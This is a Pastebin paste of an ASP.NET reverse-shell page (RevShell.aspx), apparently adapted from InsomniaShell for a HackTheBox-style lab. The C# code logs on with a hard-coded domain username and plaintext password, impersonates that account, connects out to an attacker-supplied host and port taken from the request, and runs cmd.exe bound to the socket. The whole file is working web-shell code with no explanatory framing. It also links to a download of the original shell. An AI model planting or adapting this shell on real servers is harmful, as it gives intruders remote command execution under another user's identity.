API tools faq
paste
0xv01d

RevShell.aspx

0xv01d
Nov 1st, 2022 (edited)
107
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C# 18.26 KB | Cybersecurity | 0 0
raw download clone embed print report
  1. <%@ Page Language="C#" %>
  2. <%@ Import Namespace="System.Runtime.InteropServices" %>
  3. <%@ Import Namespace="System.Net" %>
  4. <%@ Import Namespace="System.Net.Sockets" %>
  5. <%@ Import Namespace="System.Security.Principal" %>
  6. <%@ Import Namespace="System.Data.SqlClient" %>
  7. <%@ Import Namespace = "System.Web" %>
  8. <%@ Import Namespace = "System.Web.Security" %>
  9. <%@ Import Namespace = "System.Security.Principal" %>
  10. <%@ Import Namespace = "System.Runtime.InteropServices" %>
  11. <script runat="server">
  12. public const int LOGON32_LOGON_INTERACTIVE = 2;
  13. public const int LOGON32_PROVIDER_DEFAULT = 0;
  14.  
  15. WindowsImpersonationContext impersonationContext;
  16.  
  17. [DllImport("advapi32.dll")]
  18. public static extern int LogonUserA(String lpszUserName,
  19. String lpszDomain,
  20. String lpszPassword,
  21. int dwLogonType,
  22. int dwLogonProvider,
  23. ref IntPtr phToken);
  24. [DllImport("advapi32.dll", CharSet=CharSet.Auto, SetLastError=true)]
  25. public static extern int DuplicateToken(IntPtr hToken,
  26. int impersonationLevel,
  27. ref IntPtr hNewToken);
  28.  
  29. [DllImport("advapi32.dll", CharSet=CharSet.Auto, SetLastError=true)]
  30. public static extern bool RevertToSelf();
  31.  
  32. //Original shell post: https://www.darknet.org.uk/2014/12/insomniashell-asp-net-reverse-shell-bind-shell/
  33. //Download link: https://www.darknet.org.uk/content/files/InsomniaShell.zip
  34.    
  35.     protected void Page_Load(object sender, EventArgs e)
  36.     {
  37.         String host = Request["LHOST"];
  38.             int port = Convert.ToInt32(Request["LPORT"]);
  39.              
  40.             if(impersonateValidUser("BeatriceMill", "windcorp.htb", "!!!!ilovegood17"))
  41.             {  
  42.                 CallbackShell(host, port);
  43.             }
  44.     }
  45.  
  46.     [StructLayout(LayoutKind.Sequential)]
  47.     public struct STARTUPINFO
  48.     {
  49.         public int cb;
  50.         public String lpReserved;
  51.         public String lpDesktop;
  52.         public String lpTitle;
  53.         public uint dwX;
  54.         public uint dwY;
  55.         public uint dwXSize;
  56.         public uint dwYSize;
  57.         public uint dwXCountChars;
  58.         public uint dwYCountChars;
  59.         public uint dwFillAttribute;
  60.         public uint dwFlags;
  61.         public short wShowWindow;
  62.         public short cbReserved2;
  63.         public IntPtr lpReserved2;
  64.         public IntPtr hStdInput;
  65.         public IntPtr hStdOutput;
  66.         public IntPtr hStdError;
  67.     }
  68.  
  69.     [StructLayout(LayoutKind.Sequential)]
  70.     public struct PROCESS_INFORMATION
  71.     {
  72.         public IntPtr hProcess;
  73.         public IntPtr hThread;
  74.         public uint dwProcessId;
  75.         public uint dwThreadId;
  76.     }
  77.  
  78.     [StructLayout(LayoutKind.Sequential)]
  79.     public struct SECURITY_ATTRIBUTES
  80.     {
  81.         public int Length;
  82.         public IntPtr lpSecurityDescriptor;
  83.         public bool bInheritHandle;
  84.     }
  85.    
  86.    
  87.     [DllImport("kernel32.dll")]
  88.     static extern bool CreateProcess(string lpApplicationName,
  89.        string lpCommandLine, ref SECURITY_ATTRIBUTES lpProcessAttributes,
  90.        ref SECURITY_ATTRIBUTES lpThreadAttributes, bool bInheritHandles,
  91.        uint dwCreationFlags, IntPtr lpEnvironment, string lpCurrentDirectory,
  92.        [In] ref STARTUPINFO lpStartupInfo,
  93.        out PROCESS_INFORMATION lpProcessInformation);
  94.  
  95.     public static uint INFINITE = 0xFFFFFFFF;
  96.    
  97.     [DllImport("kernel32", SetLastError = true, ExactSpelling = true)]
  98.     internal static extern Int32 WaitForSingleObject(IntPtr handle, Int32 milliseconds);
  99.  
  100.     internal struct sockaddr_in
  101.     {
  102.         public short sin_family;
  103.         public short sin_port;
  104.         public int sin_addr;
  105.         public long sin_zero;
  106.     }
  107.  
  108.     [DllImport("kernel32.dll")]
  109.     static extern IntPtr GetStdHandle(int nStdHandle);
  110.  
  111.     [DllImport("kernel32.dll")]
  112.     static extern bool SetStdHandle(int nStdHandle, IntPtr hHandle);
  113.  
  114.     public const int STD_INPUT_HANDLE = -10;
  115.     public const int STD_OUTPUT_HANDLE = -11;
  116.     public const int STD_ERROR_HANDLE = -12;
  117.    
  118.     [DllImport("kernel32")]
  119.     static extern bool AllocConsole();
  120.  
  121.  
  122.     [DllImport("WS2_32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
  123.     internal static extern IntPtr WSASocket([In] AddressFamily addressFamily,
  124.                                             [In] SocketType socketType,
  125.                                             [In] ProtocolType protocolType,
  126.                                             [In] IntPtr protocolInfo,
  127.                                             [In] uint group,
  128.                                             [In] int flags
  129.                                             );
  130.  
  131.     [DllImport("WS2_32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
  132.     internal static extern int inet_addr([In] string cp);
  133.     [DllImport("ws2_32.dll")]
  134.     private static extern string inet_ntoa(uint ip);
  135.  
  136.     [DllImport("ws2_32.dll")]
  137.     private static extern uint htonl(uint ip);
  138.    
  139.     [DllImport("ws2_32.dll")]
  140.     private static extern uint ntohl(uint ip);
  141.    
  142.     [DllImport("ws2_32.dll")]
  143.     private static extern ushort htons(ushort ip);
  144.    
  145.     [DllImport("ws2_32.dll")]
  146.     private static extern ushort ntohs(ushort ip);  
  147.  
  148.    
  149.    [DllImport("WS2_32.dll", CharSet=CharSet.Ansi, SetLastError=true)]
  150.    internal static extern int connect([In] IntPtr socketHandle,[In] ref sockaddr_in socketAddress,[In] int socketAddressSize);
  151.  
  152.     [DllImport("WS2_32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
  153.    internal static extern int send(
  154.                                 [In] IntPtr socketHandle,
  155.                                 [In] byte[] pinnedBuffer,
  156.                                 [In] int len,
  157.                                 [In] SocketFlags socketFlags
  158.                                 );
  159.  
  160.     [DllImport("WS2_32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
  161.    internal static extern int recv(
  162.                                 [In] IntPtr socketHandle,
  163.                                 [In] IntPtr pinnedBuffer,
  164.                                 [In] int len,
  165.                                 [In] SocketFlags socketFlags
  166.                                 );
  167.  
  168.     [DllImport("WS2_32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
  169.    internal static extern int closesocket(
  170.                                        [In] IntPtr socketHandle
  171.                                        );
  172.  
  173.     [DllImport("WS2_32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
  174.    internal static extern IntPtr accept(
  175.                                   [In] IntPtr socketHandle,
  176.                                   [In, Out] ref sockaddr_in socketAddress,
  177.                                   [In, Out] ref int socketAddressSize
  178.                                   );
  179.  
  180.     [DllImport("WS2_32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
  181.    internal static extern int listen(
  182.                                   [In] IntPtr socketHandle,
  183.                                   [In] int backlog
  184.                                   );
  185.  
  186.     [DllImport("WS2_32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
  187.    internal static extern int bind(
  188.                                 [In] IntPtr socketHandle,
  189.                                 [In] ref sockaddr_in  socketAddress,
  190.                                 [In] int socketAddressSize
  191.                                 );
  192.  
  193.  
  194.    public enum TOKEN_INFORMATION_CLASS
  195.    {
  196.        TokenUser = 1,
  197.        TokenGroups,
  198.        TokenPrivileges,
  199.        TokenOwner,
  200.        TokenPrimaryGroup,
  201.        TokenDefaultDacl,
  202.        TokenSource,
  203.        TokenType,
  204.        TokenImpersonationLevel,
  205.        TokenStatistics,
  206.        TokenRestrictedSids,
  207.        TokenSessionId
  208.    }
  209.  
  210.    [DllImport("advapi32", CharSet = CharSet.Auto)]
  211.    public static extern bool GetTokenInformation(
  212.        IntPtr hToken,
  213.        TOKEN_INFORMATION_CLASS tokenInfoClass,
  214.        IntPtr TokenInformation,
  215.        int tokeInfoLength,
  216.        ref int reqLength);
  217.  
  218.    public enum TOKEN_TYPE
  219.    {
  220.        TokenPrimary = 1,
  221.        TokenImpersonation
  222.    }
  223.  
  224.    public enum SECURITY_IMPERSONATION_LEVEL
  225.    {
  226.        SecurityAnonymous,
  227.        SecurityIdentification,
  228.        SecurityImpersonation,
  229.        SecurityDelegation
  230.    }
  231.    
  232.    [DllImport("advapi32.dll", EntryPoint = "CreateProcessAsUser", SetLastError = true, CharSet = CharSet.Ansi, CallingConvention = CallingConvention.StdCall)]
  233.    public extern static bool CreateProcessAsUser(IntPtr hToken, String lpApplicationName, String lpCommandLine, ref SECURITY_ATTRIBUTES lpProcessAttributes,
  234.        ref SECURITY_ATTRIBUTES lpThreadAttributes, bool bInheritHandle, int dwCreationFlags, IntPtr lpEnvironment,
  235.        String lpCurrentDirectory, ref STARTUPINFO lpStartupInfo, out PROCESS_INFORMATION lpProcessInformation);
  236.  
  237.     [DllImport("advapi32.dll", EntryPoint="DuplicateTokenEx")]
  238.     public extern static bool DuplicateTokenEx(IntPtr ExistingTokenHandle, uint dwDesiredAccess, ref SECURITY_ATTRIBUTES lpThreadAttributes, int TokenType, int ImpersonationLevel, ref IntPtr DuplicateTokenHandle);
  239.  
  240.    const int ERROR_NO_MORE_ITEMS = 259;
  241.  
  242.    [StructLayout(LayoutKind.Sequential)]
  243.    struct TOKEN_USER
  244.    {
  245.        public _SID_AND_ATTRIBUTES User;
  246.    }
  247.  
  248.    [StructLayout(LayoutKind.Sequential)]
  249.    public struct _SID_AND_ATTRIBUTES
  250.    {
  251.        public IntPtr Sid;
  252.        public int Attributes;
  253.    }
  254.  
  255.    [DllImport("advapi32", CharSet = CharSet.Auto)]
  256.    public extern static bool LookupAccountSid
  257.    (
  258.        [In, MarshalAs(UnmanagedType.LPTStr)] string lpSystemName,
  259.        IntPtr pSid,
  260.        StringBuilder Account,
  261.        ref int cbName,
  262.        StringBuilder DomainName,
  263.        ref int cbDomainName,
  264.        ref int peUse
  265.  
  266.    );
  267.  
  268.    [DllImport("advapi32", CharSet = CharSet.Auto)]
  269.    public extern static bool ConvertSidToStringSid(
  270.        IntPtr pSID,
  271.        [In, Out, MarshalAs(UnmanagedType.LPTStr)] ref string pStringSid);
  272.  
  273.  
  274.    [DllImport("kernel32.dll", SetLastError = true)]
  275.    public static extern bool CloseHandle(
  276.        IntPtr hHandle);
  277.  
  278.    [DllImport("kernel32.dll", SetLastError = true)]
  279.    public static extern IntPtr OpenProcess(ProcessAccessFlags dwDesiredAccess, [MarshalAs(UnmanagedType.Bool)] bool bInheritHandle, uint dwProcessId);
  280.    [Flags]
  281.    public enum ProcessAccessFlags : uint
  282.    {
  283.        All = 0x001F0FFF,
  284.        Terminate = 0x00000001,
  285.        CreateThread = 0x00000002,
  286.        VMOperation = 0x00000008,
  287.        VMRead = 0x00000010,
  288.        VMWrite = 0x00000020,
  289.        DupHandle = 0x00000040,
  290.        SetInformation = 0x00000200,
  291.        QueryInformation = 0x00000400,
  292.        Synchronize = 0x00100000
  293.    }
  294.  
  295.    [DllImport("kernel32.dll")]
  296.    static extern IntPtr GetCurrentProcess();
  297.  
  298.    [DllImport("kernel32.dll")]
  299.    extern static IntPtr GetCurrentThread();
  300.  
  301.  
  302.    [DllImport("kernel32.dll", SetLastError = true)]
  303.    [return: MarshalAs(UnmanagedType.Bool)]
  304.    static extern bool DuplicateHandle(IntPtr hSourceProcessHandle,
  305.       IntPtr hSourceHandle, IntPtr hTargetProcessHandle, out IntPtr lpTargetHandle,
  306.       uint dwDesiredAccess, [MarshalAs(UnmanagedType.Bool)] bool bInheritHandle, uint dwOptions);
  307.  
  308.     [DllImport("psapi.dll", SetLastError = true)]
  309.     public static extern bool EnumProcessModules(IntPtr hProcess,
  310.     [MarshalAs(UnmanagedType.LPArray, ArraySubType = UnmanagedType.U4)] [In][Out] uint[] lphModule,
  311.     uint cb,
  312.     [MarshalAs(UnmanagedType.U4)] out uint lpcbNeeded);
  313.  
  314.     [DllImport("psapi.dll")]
  315.     static extern uint GetModuleBaseName(IntPtr hProcess, uint hModule, StringBuilder lpBaseName, uint nSize);
  316.  
  317.     public const uint PIPE_ACCESS_OUTBOUND = 0x00000002;
  318.     public const uint PIPE_ACCESS_DUPLEX = 0x00000003;
  319.     public const uint PIPE_ACCESS_INBOUND = 0x00000001;
  320.     public const uint PIPE_WAIT = 0x00000000;
  321.     public const uint PIPE_NOWAIT = 0x00000001;
  322.     public const uint PIPE_READMODE_BYTE = 0x00000000;
  323.     public const uint PIPE_READMODE_MESSAGE = 0x00000002;
  324.     public const uint PIPE_TYPE_BYTE = 0x00000000;
  325.     public const uint PIPE_TYPE_MESSAGE = 0x00000004;
  326.     public const uint PIPE_CLIENT_END = 0x00000000;
  327.     public const uint PIPE_SERVER_END = 0x00000001;
  328.     public const uint PIPE_UNLIMITED_INSTANCES = 255;
  329.  
  330.     public const uint NMPWAIT_WAIT_FOREVER = 0xffffffff;
  331.     public const uint NMPWAIT_NOWAIT = 0x00000001;
  332.     public const uint NMPWAIT_USE_DEFAULT_WAIT = 0x00000000;
  333.  
  334.     public const uint GENERIC_READ = (0x80000000);
  335.     public const uint GENERIC_WRITE = (0x40000000);
  336.     public const uint GENERIC_EXECUTE = (0x20000000);
  337.     public const uint GENERIC_ALL = (0x10000000);
  338.  
  339.     public const uint CREATE_NEW = 1;
  340.     public const uint CREATE_ALWAYS = 2;
  341.     public const uint OPEN_EXISTING = 3;
  342.     public const uint OPEN_ALWAYS = 4;
  343.     public const uint TRUNCATE_EXISTING = 5;
  344.  
  345.     public const int INVALID_HANDLE_VALUE = -1;
  346.  
  347.     public const ulong ERROR_SUCCESS = 0;
  348.     public const ulong ERROR_CANNOT_CONNECT_TO_PIPE = 2;
  349.     public const ulong ERROR_PIPE_BUSY = 231;
  350.     public const ulong ERROR_NO_DATA = 232;
  351.     public const ulong ERROR_PIPE_NOT_CONNECTED = 233;
  352.     public const ulong ERROR_MORE_DATA = 234;
  353.     public const ulong ERROR_PIPE_CONNECTED = 535;
  354.     public const ulong ERROR_PIPE_LISTENING = 536;
  355.  
  356.     [DllImport("kernel32.dll", SetLastError = true)]
  357.     public static extern IntPtr CreateNamedPipe(
  358.         String lpName,                                
  359.         uint dwOpenMode,                            
  360.         uint dwPipeMode,                            
  361.         uint nMaxInstances,                            
  362.         uint nOutBufferSize,                        
  363.         uint nInBufferSize,                            
  364.         uint nDefaultTimeOut,                        
  365.         IntPtr pipeSecurityDescriptor
  366.         );
  367.  
  368.     [DllImport("kernel32.dll", SetLastError = true)]
  369.     public static extern bool ConnectNamedPipe(
  370.         IntPtr hHandle,
  371.         uint lpOverlapped
  372.         );
  373.  
  374.     [DllImport("Advapi32.dll", SetLastError = true)]
  375.     public static extern bool ImpersonateNamedPipeClient(
  376.         IntPtr hHandle);
  377.  
  378.     [DllImport("kernel32.dll", SetLastError = true)]
  379.     public static extern bool GetNamedPipeHandleState(
  380.         IntPtr hHandle,
  381.         IntPtr lpState,
  382.         IntPtr lpCurInstances,
  383.         IntPtr lpMaxCollectionCount,
  384.         IntPtr lpCollectDataTimeout,
  385.         StringBuilder lpUserName,
  386.         int nMaxUserNameSize
  387.         );
  388.  
  389.     protected void CallbackShell(string server, int port)
  390.     {
  391.  
  392.         string request = "Spawn Shell...\n";
  393.         Byte[] bytesSent = Encoding.ASCII.GetBytes(request);
  394.  
  395.         IntPtr oursocket = IntPtr.Zero;
  396.        
  397.         sockaddr_in socketinfo;
  398.         oursocket = WSASocket(AddressFamily.InterNetwork,SocketType.Stream,ProtocolType.IP, IntPtr.Zero, 0, 0);
  399.         socketinfo = new sockaddr_in();
  400.         socketinfo.sin_family = (short) AddressFamily.InterNetwork;
  401.         socketinfo.sin_addr = inet_addr(server);
  402.         socketinfo.sin_port = (short) htons((ushort)port);
  403.         connect(oursocket, ref socketinfo, Marshal.SizeOf(socketinfo));
  404.         send(oursocket, bytesSent, request.Length, 0);
  405.         SpawnProcessAsPriv(oursocket);
  406.         closesocket(oursocket);
  407.     }
  408.  
  409.     protected void SpawnProcess(IntPtr oursocket)
  410.     {
  411.         bool retValue;
  412.         string Application = Environment.GetEnvironmentVariable("comspec");
  413.         PROCESS_INFORMATION pInfo = new PROCESS_INFORMATION();
  414.         STARTUPINFO sInfo = new STARTUPINFO();
  415.         SECURITY_ATTRIBUTES pSec = new SECURITY_ATTRIBUTES();
  416.         pSec.Length = Marshal.SizeOf(pSec);
  417.         sInfo.dwFlags = 0x00000101;
  418.         sInfo.hStdInput = oursocket;
  419.         sInfo.hStdOutput = oursocket;
  420.         sInfo.hStdError = oursocket;
  421.         retValue = CreateProcess(Application, "", ref pSec, ref pSec, true, 0, IntPtr.Zero, null, ref sInfo, out pInfo);
  422.         WaitForSingleObject(pInfo.hProcess, (int)INFINITE);
  423.     }
  424.  
  425.     protected void SpawnProcessAsPriv(IntPtr oursocket)
  426.     {
  427.         bool retValue;
  428.         string Application = Environment.GetEnvironmentVariable("comspec");
  429.         PROCESS_INFORMATION pInfo = new PROCESS_INFORMATION();
  430.         STARTUPINFO sInfo = new STARTUPINFO();
  431.         SECURITY_ATTRIBUTES pSec = new SECURITY_ATTRIBUTES();
  432.  
  433.         IntPtr Token = new IntPtr(0);
  434.         IntPtr DupedToken = new IntPtr(0);
  435.         bool ret;
  436.         SECURITY_ATTRIBUTES sa = new SECURITY_ATTRIBUTES();
  437.         sa.bInheritHandle = false;
  438.         sa.Length = Marshal.SizeOf(sa);
  439.         sa.lpSecurityDescriptor = (IntPtr)0;
  440.  
  441.         Token = WindowsIdentity.GetCurrent().Token;
  442.         const uint GENERIC_ALL = 0x10000000;
  443.         const int SecurityImpersonation = 2;
  444.         const int TokenType = 1;
  445.         ret = DuplicateTokenEx(Token, GENERIC_ALL, ref sa, SecurityImpersonation, TokenType, ref DupedToken);
  446.  
  447.         pSec.Length = Marshal.SizeOf(pSec);
  448.         sInfo.dwFlags = 0x00000101;
  449.         IntPtr DupeToken = new IntPtr(0);
  450.         sInfo.hStdInput = oursocket;
  451.         sInfo.hStdOutput = oursocket;
  452.         sInfo.hStdError = oursocket;
  453.         if (DupedToken == IntPtr.Zero)
  454.             retValue = CreateProcess(Application, "", ref pSec, ref pSec, true, 0, IntPtr.Zero, null, ref sInfo, out pInfo);
  455.         else
  456.             retValue = CreateProcessAsUser(DupedToken, Application, "", ref pSec, ref pSec, true, 0, IntPtr.Zero, null, ref sInfo, out pInfo);
  457.         WaitForSingleObject(pInfo.hProcess, (int)INFINITE);
  458.         CloseHandle(DupedToken);
  459.     }
  460.  
  461.     private bool impersonateValidUser(String userName, String domain, String password)
  462. {
  463.     WindowsIdentity tempWindowsIdentity;
  464.     IntPtr token = IntPtr.Zero;
  465.     IntPtr tokenDuplicate = IntPtr.Zero;
  466.  
  467.     if(RevertToSelf())
  468.     {
  469.         if(LogonUserA(userName, domain, password, LOGON32_LOGON_INTERACTIVE,
  470.         LOGON32_PROVIDER_DEFAULT, ref token)!= 0)
  471.         {
  472.             if(DuplicateToken(token, 2, ref tokenDuplicate)!= 0)
  473.             {
  474.                 tempWindowsIdentity = new WindowsIdentity(tokenDuplicate);
  475.                 impersonationContext = tempWindowsIdentity.Impersonate();
  476.                 if (impersonationContext != null)
  477.                 {
  478.                     CloseHandle(token);
  479.                     CloseHandle(tokenDuplicate);
  480.                     return true;
  481.                 }
  482.             }
  483.         }
  484.     }
  485.     if(token!= IntPtr.Zero)
  486.         CloseHandle(token);
  487.     if(tokenDuplicate!=IntPtr.Zero)
  488.         CloseHandle(tokenDuplicate);
  489.     return false;
  490. }
  491.  
  492. private void undoImpersonation()
  493. {
  494.     impersonationContext.Undo();
  495. }
  496.     </script>
Tags: Impersonate ReverseShell
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!